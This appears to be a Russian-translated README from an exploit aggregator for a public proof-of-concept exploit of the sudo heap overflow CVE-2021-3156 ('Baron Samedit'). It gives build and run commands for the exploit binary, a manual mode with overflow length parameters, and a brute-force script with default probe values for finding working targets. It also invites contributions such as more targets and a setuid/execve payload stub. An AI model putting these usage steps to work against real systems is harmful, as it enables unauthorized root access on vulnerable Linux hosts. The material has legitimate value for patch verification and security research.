## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BLASTY-CVE-2021-3156
# CVE-2021-3156 PoC
## Введение
Это эксплойт для уязвимости sudo `CVE-2021-3156` (названной Baron Samedit компанией Qualys).
## Использование
сборка:
root@kitploit:~
$ make
список целей:
root@kitploit:~
$ ./sudo-hax-me-a-sandwich
запуск:
root@kitploit:~
$ ./sudo-hax-me-a-sandwich <target_number>
ручной режим:
root@kitploit:~
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
## Поиск целей методом перебора (экспериментальный)
Убедитесь, что у вас установлен GNU parallel.
root@kitploit:~
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
некоторые значения по умолчанию для проб:
root@kitploit:~
$ ./brute.sh 90 120 50 70 150 300
Съест все доступные ядра. Не пытайтесь смотреть Netflix и одновременно использовать брутфорс.
## Вклад
Присылайте (разумные) пул-реквесты, возможно, я их смержу.
Некоторые идеи:
* Больше целей
* Поиск целей
* Другие стратегии эксплуатации
* Больше автономной функциональности:
* Встраивание общей библиотеки hax.c (Сделайте её маленькой, пожалуйста, ELF-гольф + asm-заглушка setuid/execve)
* Добавление логики mkdir в hax.c
* Очистка каталогов/общих библиотек